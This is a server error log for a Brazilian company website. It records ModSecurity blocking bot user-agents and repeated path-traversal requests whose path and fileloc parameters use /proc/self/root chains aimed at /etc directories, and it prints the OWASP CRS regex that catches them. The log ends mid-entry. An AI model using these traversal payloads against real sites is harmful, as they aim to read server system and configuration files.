https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:43:05.014858 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.244.43:52530] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqPyQkwaGbbGflqUZD7nQAAANM"]
[Wed Mar 18 08:43:05.383104 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:40270] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPyeyqAr6etmhZHNqozwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:43:09.100336 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:40282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPy9Y0UrI5A3LftIyLrQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:43:09.109665 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.228.61:52486] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqPy-oXxyEfFpUF8f9ZegAAAUQ"]
[Wed Mar 18 08:43:10.753471 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:39496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqPzuyqAr6etmhZHNqo1AAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:43:19.090087 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:39502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqP19a6ubjKNq_cu4aDQAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:43:20.438775 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:50778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqP2Mdf6f5d65gmYZS-3QAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:43:21.730975 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:50784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqP2SmAPhZkrhU8w4lYZAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:43:22.959802 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:50792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqP2uyqAr6etmhZHNqo3wAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:43:23.170274 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:50792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqP2-yqAr6etmhZHNqo4AAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:43:50.462142 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:43710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqP9fu8EFLIOrSqIpvwNAAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:43:54.046786 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:50794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqP-ta6ubjKNq_cu4aDbgAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:43:54.107506 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.241.31:56474] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqP-vu8EFLIOrSqIpvwNwAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:44:06.571945 2026] [mime_magic:error] [pid 19507:tid 140411624429312] (70014)End of file found: [client 57.141.18.36:44464] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:44:06.757159 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:33216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQBuoXxyEfFpUF8f9ZqAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:44:08.486589 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:44248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQCOyqAr6etmhZHNqpAAAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:44:10.263390 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:60792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQCkzinOy1jxa1j4f-zAAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:44:31.804442 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:60806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQH-w_le52K8_3pV3LdQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:44:34.173279 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:37334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQIsdf6f5d65gmYZS_UwAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:44:37.659136 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:37344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQJda6ubjKNq_cu4aDuAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:44:40.182256 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:37348] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQKNY0UrI5A3LftIyL_gAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:44:42.707358 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:41900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQKvu8EFLIOrSqIpvwggAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:44:47.687199 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.243.128:41910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqQL-w_le52K8_3pV3LiwAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:44:49.262956 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.243.128:41918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 